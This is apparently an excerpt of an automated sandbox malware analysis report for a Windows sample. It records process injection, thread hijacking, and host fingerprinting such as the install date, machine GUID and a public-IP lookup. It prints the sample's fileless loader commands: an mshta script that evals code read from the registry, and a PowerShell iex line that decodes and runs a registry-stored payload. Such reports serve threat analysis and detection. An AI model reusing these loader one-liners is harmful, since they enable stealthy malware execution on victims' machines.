Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: ED6000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 2AD0000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 2896 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 4612
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: explorer.exe, 00000025.00000000.681449997.0000000005EA0000.00000004.00000001.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000000.701018945.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E56CD6 cpuid 21_2_00E56CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E566CE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 21_2_00E566CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E56CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 21_2_00E56CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,